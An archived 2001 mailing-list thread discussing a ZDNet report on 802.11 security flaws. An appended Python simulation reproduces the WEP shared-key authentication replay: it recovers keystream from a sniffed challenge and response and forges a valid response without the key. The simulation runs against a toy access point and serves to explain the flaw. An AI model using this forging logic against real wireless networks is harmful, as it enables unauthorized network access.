RE: ZDNet - Security flaws in the 802.11 wireless LAN protocol.

From: Steve Dossick (
Date: Tue Apr 03 2001 - 20:49:08 PDT

Wireless LANs are no better than a sloppy wired networking job. I have
worked in places where the corporate firewall was in a shared datacenter in
the basement of the building; any one of the tenants of the building could
have gone in and tapped into another's network. Large organizations with
open DHCP servers (giving out addresses to all comers) are also not
particularly secure, but that doesn't stop people from setting them up.

Any data which needs security should be transported over a more secure
medium or encrypted first.


-----Original Message-----
From: Mike Dierken
Sent: 4/3/01 8:30 PM
Subject: ZDNet - Security flaws in the 802.11 wireless LAN protocol.

For those interested in wireless LANs, security, etc.


April 3, 2001 2:15 PM PT
A University of Maryland research team said Tuesday that it had
identified several more security flaws in the much-maligned 802.11
wireless LAN protocol.

Earlier this year, researchers at the University of California at
Berkeley discovered several vulnerabilities in the encryption protocol
used on wireless LANs.

"When you combine this with the stuff that the Berkeley guys found, it
pretty much covers all of the security in these wireless access points,"
said William Arbaugh, assistant professor of computer science at the
University of Maryland in College Park.

The latest problems have to do with the way the protocol handles access
control and authorization requests. Arbaugh said finding the problems
was "exceedingly easy" and that exploiting them was trivial.

Potentially the most serious of the three flaws is a hole that allows an
eavesdropper to sniff the name of the network -- which is used as a
shared secret for authentication purposes in some 802.11
implementations, including the Lucent Technologies Inc. Orinoco cards
that Arbaugh's team used -- and then use the information to access the

This would be prevented by the WEP (Wireless Equivalent Privacy)
encryption used in 802.11, but the messages containing the network name
are always broadcast in cleartext, Arbaugh said.

The team also identified a problem with the MAC (media access control)
addresses used on wireless LAN cards. Like the network name, MAC
addresses are broadcast in cleartext and can therefore be easily
captured by an eavesdropper. The attacker can then program the address
onto his or her card and access the network.

The final attack involves capturing via eavesdropping the plaintext and
ciphertext of the shared keys used for authentication. Using this
information, an attacker can compute the valid authentication response
and then compute a new integrity check value using another known exploit
and join the network.


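The third attack in the forwarded article (recovering the authentication keystream by XORing the cleartext challenge against the encrypted response, then answering a fresh challenge without ever knowing the key) is easiest to understand as a message exchange. The following is an added simulation, written for this archive page; it is not code from the Maryland team, from ZDNet, or from any 802.11 vendor. It implements RC4 and WEP's CRC-32 ICV as 802.11-1999 specifies them, but the 40-bit key, the IV and the challenges are constructed values, and the AccessPoint class is a toy that accepts any IV, as real WEP access points did (the standard never required IV-reuse detection).

```python
"""Simulation of the 802.11 shared-key authentication replay.

Constructed example: key, IV and challenge values are made up, and the
AccessPoint is a minimal stand-in for a real WEP access point.
"""
import os
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA), the stream cipher WEP uses."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return zlib.crc32(data).to_bytes(4, "little")


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: IV || RC4(IV || key)(plaintext || ICV)."""
    return iv + rc4(iv + key, plaintext + icv(plaintext))


def wep_decrypt(key: bytes, body: bytes):
    """Return the plaintext if the ICV verifies, otherwise None."""
    iv, ct = body[:3], body[3:]
    pt = rc4(iv + key, ct)
    data, tag = pt[:-4], pt[-4:]
    return data if icv(data) == tag else None


class AccessPoint:
    """Toy AP: frame 2 is a cleartext challenge, frame 3 must decrypt to it."""

    def __init__(self, key: bytes):
        self.key = key
        self.last_challenge = None

    def challenge(self) -> bytes:
        self.last_challenge = os.urandom(128)   # sent in the clear
        return self.last_challenge

    def verify(self, body: bytes) -> bool:
        return wep_decrypt(self.key, body) == self.last_challenge


def recover_keystream(challenge: bytes, body: bytes):
    """Eavesdropper: XOR frame 2 plaintext (with its ICV) against frame 3."""
    iv, ct = body[:3], body[3:]
    pt = challenge + icv(challenge)
    return iv, bytes(a ^ b for a, b in zip(pt, ct))


def forge_response(iv: bytes, keystream: bytes, new_challenge: bytes) -> bytes:
    """Attacker: compute the new ICV and reuse IV + keystream; no key needed."""
    pt = new_challenge + icv(new_challenge)
    return iv + bytes(a ^ b for a, b in zip(pt, keystream))


def run_attack(key: bytes = b"\x01\x23\x45\x67\x89") -> bool:
    """Replay the full exchange; True means the forged response was accepted."""
    ap = AccessPoint(key)
    # A legitimate station authenticates; the attacker sniffs frames 2 and 3.
    c1 = ap.challenge()
    frame3 = wep_encrypt(key, b"\x0a\x0b\x0c", c1)
    assert ap.verify(frame3)
    iv, ks = recover_keystream(c1, frame3)
    # The attacker now authenticates against a fresh challenge with only ks.
    c2 = ap.challenge()
    return ap.verify(forge_response(iv, ks, c2))


if __name__ == "__main__":
    print("forged authentication accepted:", run_attack())
```

The point the simulation makes is that shared-key authentication leaks exactly the 132 bytes of keystream (128-byte challenge plus 4-byte ICV) that a response needs, so the "known exploit" the article alludes to (the CRC-32 ICV being computable by anyone) is all that stands between an eavesdropper and a valid response. It also shows why Steve's conclusion holds: the link-layer authentication here contributes nothing, so anything that needs protecting has to be encrypted above it.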
This archive was generated by hypermail 2b29 : Sun Apr 29 2001 - 20:25:29 PDT